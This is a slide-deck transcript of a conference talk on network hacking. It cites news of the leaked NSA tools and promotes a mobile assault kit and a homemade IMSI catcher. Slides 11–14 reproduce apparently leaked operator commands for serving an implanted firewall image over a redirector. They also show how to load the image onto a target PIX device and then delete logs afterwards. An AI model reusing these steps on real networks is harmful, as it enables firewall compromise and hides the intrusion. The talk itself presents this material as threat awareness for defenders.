In todays IT security world, we accept and embrace that the technology is constantly changing, we are very often still amazed at the rapid growth of the technology evolution and how it has far superseded beyond expectations, whilst thinking about the potential uses of this new technology we get excited and then it hits us! What about the security implications for our organization?? Holy Crap what did you say about SS7? In this presentation, Wayne will take you through some real live demonstrations of Network Crypto Hacking and Exploitation using the latest custom built, SWAT (Special Weapons and Technology) cyber-warfare hacking tools. To help us defend against the latest threats, that sends our risk rating scores off the chart? We do as we have always done! Research the threat viability, learn and deploy defense and mitigation options. For this very reason its imperative for us to stay up-to date with new emerging threats tactics.

1. Presenters: Kevin Cardwell & Wayne Burke
Network Crypto Hacking:

2. http://thehackernews.com/2016/09/xiaomi-android-backdoor.html

3. https://securelist.com/blog/incidents/75812/the-equation-giveaway/

4. http://thehackernews.com/2016/08/nsa-hacking-tools.html

5. http://thehackernews.com/2016/08/nsa-hack-russia-leak.html

6. http://thehackernews.com/2016/08/nsa-hack-exploit.html

7. http://thehackernews.com/2016/08/cisco-firewall-hack.html

8. http://thehackernews.com/2015/10/nsa-crack-encryption.html
Mystery Solved ??

9. https://twitter.com/SilentSignalHU/status/768095445444861952?ref_src=twsrc%5Etfw

10. Diving into tactics :
•In the next few slides we will review some
detailed real simple tactics.
•The ultimate goal of eventually owning
your entire environment.

11. # Before you even get to the op, you need to create a PIX/ASA IOS image,
# key it, and test it. Bring the image and the key to the op.
########## How to get Apache installed on the ops station ##########
#
# cd to the Apache tools directory
cd /current/bin/FW/Tools/Apache
# Run this first to get the RPM to install without issue
rpm -e httpd httpd-suexec mod_ssl apr-util
# Run this next to load apache rpm's
rpm -hiv *.rpm
# In this directory is modified versions of the config files
cp httpd.conf /etc/httpd/conf/httpd.conf
cp ssl.conf /etc/httpd/conf.d/ssl.conf
Apache Implant – Staging your Hack

12. # Create a test html file
echo "<html><body>This is a test</body></html>" > /var/www/html/index.html
# Put the image file you want to up/download into this directory with a
# common name:
cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin
# Set permissions for items in html directory
chmod 744 /var/www/html/*
# Start up the apache server
service httpd start
# Start up your browser to verify it works.
# You should get a pop-up asking to verify the ssl cert.
# Then you'll get the index.html page which will say "This is a test".
firefox https://127.0.0.1:4443 &

13. # Setup a remote listener on 443 on redirector to hit apache on 4443
-tunnel
r 443 127.0.0.1 4443
# Now you are ready to go to the target pix and run this command
copy https://<ip of redirector>:<port if !443>/<name of image file> flash
# Log off of the pix
exit

14. ######## Getting Ops Station Back to normal ########
#
# Once the upload is done, stop apache
service httpd stop
# Remove installed rpm's
rpm -e httpd httpd-suexec mod_ssl apr-util
# Then you need to remove any directories still remaining.
rm -rf /var/log/httpd /etc/httpd /var/www
#### OTHER INFO ####
# To install apache, you need 3 rpm's:
# httpd-2.0.52-19.ent.i386.rpm
# httpd-suexec-2.0.52-19.ent.i386.rpm
# mod_ssl-2.0.52-19.ent.i386.rpm
# apr-util-0.9.4-17.i386.rpm

15. Scripting the implant:

18. Game: What does a Hacker See …… …… ?
when using a very cheap single board mobile ARM device…
Lets role play

19. No Not The APPLE …… Ꙭ
Mobile Assault Kit
www.csiswat.com

20. Sample Commercial Products
• PWN PLUG V4 Latest - $1,095.00 – Expensive Open Source Support!!

21. Can we do better for less?
• Our MAK Base 1 or 2:

22. A flying Heli IMSI Catcher / Stingray Homemade with BladeRF SDR

23. Thanks for listening 
Wayne Burke:
w5432b@csiswat.com
Kevin Cardwell:
k2345c@csiswat.com